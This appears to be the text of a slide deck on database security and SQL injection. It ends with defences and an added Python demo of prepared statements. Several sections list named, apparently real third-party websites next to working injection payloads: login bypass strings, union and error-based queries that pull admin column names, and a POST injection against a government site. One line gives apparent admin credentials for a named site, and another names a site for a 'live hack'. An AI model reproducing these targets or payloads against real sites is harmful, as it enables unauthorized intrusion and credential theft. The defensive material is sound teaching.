DATABASE & DATABASE SECURITY
By Rehan Manzoor
What actually is a database
Code and Filing concept
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct Queries)
Custom defined functions
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate
Well, that is the real question: how do we integrate? Problems arise when we do not connect the app to the database correctly. The code is what matters.
Contents continued..
Database Attacks
What is a Database Attack
Explanation
OWASP Rating (damage rate)
Destruction of SQL injection
History
Reviews
Recent bidding in underground
Database Attacks
Excessive Privileges
Privilege abuse
Unauthorized privilege elevation
Platform Vulnerabilities
SQL Injection
Weak Audit
Denial of Service
Top 10 vuln by OWASP
Destruction of SQL Injection Attack Heartland Payment Systems
This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.
TJX: More than 45 million people had their credit card details stolen, and some experts said the actual figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites
http://www.equinet.ch/fr/gestion/login.php 1' OR '1'='1
http://lionsclubofwashim.co.in/admin.php 1' OR '1'='1
admin.axilbusiness.in 1' OR '1'='1
http://www.anemos.in/admin/ 1' OR '1'='1
Query Code
Code: select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
Union based attack
http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—
http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –
Code: select * from tblName where id='"+Request.QueryString["id"]+"';
Error Based Attack
http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2
http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
http://www.grabbbit.com/admin/login.aspx userid admin password grabbbit$
Code: select column1, column2, column3 from table1 join table2 on table1.column1 = table2.column1 where id='"+Request.QueryString["id"]+"';
Blind Attack
fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php
Code: the query is the same here as in the union case, but the problem is with the labels (the fields the page displays). The page's designer does not show them, so either they are also stored in the database or they cannot be used with union, and the result of the query never appears in the response.
POST Sql Injection
URL: http://haryanapolice.gov.in/police/pressreleases/search.asp
POST body: text1=rummy'&text2=11/11/2010&SUBMIT=search
Code: select * from tablename where text1='"+Request.Form["text1"].ToString()+"' and text2='"+Request.Form["text2"].ToString()+"';
Why SQL Injection Is Possible
Who is responsible: the database or the programmer?
Why Not To Blame the Database
Database's secure nature
Lack of awareness
No research-based study
Lack of interest
Non-professional coders
Detection of SQL Injection
Manual Check: why, how, by whom
Automated Check: tools, scanners
Securing From SQL Injection
Learn about it
Firewalls
By code:
Don't disclose any parameter if at all possible
Give the session user the least possible rights
Blacklist evil keywords for the session user
User input validation
Use prepared statements
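The slide's login query builds SQL by concatenating the form fields, which is what lets the `1' OR '1'='1` input from the earlier slides match every row. The following is an added example (not code from the original presentation), written in Python against an in-memory SQLite table with one constructed sample row; `login_concat` mirrors the slide's concatenated query and `login_parameterized` is the prepared-statement version recommended above. The table, row and password value are assumptions for the demonstration.

```python
import sqlite3


def build_db():
    """Create an in-memory database with one constructed admin row (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (username text, password text)")
    conn.execute("insert into admin values ('admin', 'constructed-sample-password')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the same string-built query as on the slide.
    User input becomes part of the SQL text, so quotes in the input change the query."""
    sql = ("select username, password from admin where username='"
           + username + "' and password='" + password + "';")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Hardened: a prepared statement. The driver sends the values separately,
    so the input is always compared as data and never parsed as SQL."""
    sql = "select username, password from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Run both versions with the tautology input shown on the slides and with a real login."""
    conn = build_db()
    tautology = "1' OR '1'='1"
    return {
        # concatenation: the OR clause makes the WHERE true for every row
        "concat_rows": len(login_concat(conn, tautology, tautology)),
        # prepared statement: the same text is just a username that does not exist
        "param_rows": len(login_parameterized(conn, tautology, tautology)),
        # the legitimate credentials still work with the prepared statement
        "legit_param_rows": len(login_parameterized(conn, "admin", "constructed-sample-password")),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated version returns the admin row for input that is not a valid credential, while the parameterized version returns nothing for it and still returns the row for the real credentials. This is why prepared statements are the primary fix: keyword blacklisting and input validation only narrow the inputs that reach the query, whereas parameter binding removes the parsing step that makes injection possible.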
More on Firewalls
Use of Firewall
As it is
Customized
Buffer overflows
Null bytes
Difference between a normal user and a hacker
Buffer Overflows
Live example
https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
Bypassing from keyword
Live Hack Of A Website
http://aquaservices.co.in/
Conclusion
Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.